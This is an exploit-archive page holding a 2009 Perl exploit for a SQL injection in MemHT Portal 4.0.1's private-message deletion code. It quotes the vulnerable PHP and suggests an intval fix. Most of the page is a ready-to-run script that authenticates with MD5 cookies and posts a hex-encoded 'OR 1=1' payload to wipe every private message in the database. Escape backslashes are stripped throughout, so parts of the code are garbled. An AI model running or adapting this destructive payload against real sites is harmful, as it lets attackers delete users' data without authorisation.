[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
# Published : 2009-02-16
# Author : StAkeR
# Previous Title : NovaBoard 1.0.0 Multiple Remote Vulnerabilities
# Next Title : SAS Hotel Management System (myhotel_info.asp) SQL Injection Vuln
#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit
# by yeat - staker[at]hotmail[dot]it
<<Details;
Note:
1- works regardless of php.ini settings.
2- blind sql injection benchmark() method is possible.
3- don't add me on msn messenger.
4- Thanks to evilsocket && Sir Dark.
5- MemHT is a good content management system but it has some security problem.
6- http://milw0rm.com/exploits/7859
security patch: http://www.memht.com/forum_thread_17756_FixPatch-4-0-1.html
/pages/pvtmsg/index.php / Line: 851 -867
<?php
}
break;
case "deleteSelected":
if (isset($_POST['deletenewpm'])) {
foreach ($_POST['deletenewpm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
if (isset($_POST['deletepm'])) {
foreach ($_POST['deletepm'] as $value) {
$dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
}
}
?>
ok then foreach ($_POST['deletenewpm'] as $value)
deletenewpm[]= $value ;) so if we send a evil code like this:
1 OR 1=1 we'll delete all messages from mysql database
Possible Fix:
Line: 859 && 864
Edit $dblink->query("DELETE FROM memht_pvtmsg WHERE id=$value");
Fix: $dblink->query("DELETE FROM memht_pvtmsg WHERE id=".intval($value));
regards :)
Details
use IO::Socket;
use Digest::MD5('md5_hex');
our ($host,$path,$id,$username,$password) = @ARGV;
if (@ARGV != 5) {
print "n+--------------------------------------------------------------------+r",
"n| MemHT Portal <= 4.0.1 (pvtmsg) Delete All Private Messages Exploit |r",
"n+--------------------------------------------------------------------+r",
"nby yeat - staker[at]hotmail[dot]itn",
"nUsage + perl $0 [host] [path] [id] [username] [password]r",
"nHost + localhostr",
"nPath + /MemHTr",
"nID + your user idr",
"nPassword + your passwordn";
exit;
}
else {
my $html = undef;
my $sock = new IO::Socket::INET(
PeerAddr => $host,
PeerPort => 80,
Proto => 'tcp',
) or die $!;
my $post = "deletenewpm[]=x31x20x4Fx52x20x31x3Dx31".
"&Submit.x=34".
"&Submit.y=9";
my $auth = cookies();
my $data = "POST /$path/index.php?page=pvtmsg&op=deleteSelected HTTP/1.1rn".
"Host: $hostrn".
"User-Agent: Lynx (textmode)rn".
"Cookie: $authrn".
"Content-Type: application/x-www-form-urlencodedrn".
"Content-Length: ".length($post)."rnrn$postrnrn".
"Connection: closernrn";
$sock->send($data);
while (<$sock>) {
$html .= $_;
}
if ($html =~ /Private Messages/i) {
print "Exploit successfull,all messages deleted.n";
}
else {
print "Exploit failed!n";
}
}
sub cookies
{
$username = md5_hex($username);
$password = md5_hex($password);
return "login_user=$id#$username#$password";
}
# www.Syue.com [2009-02-16]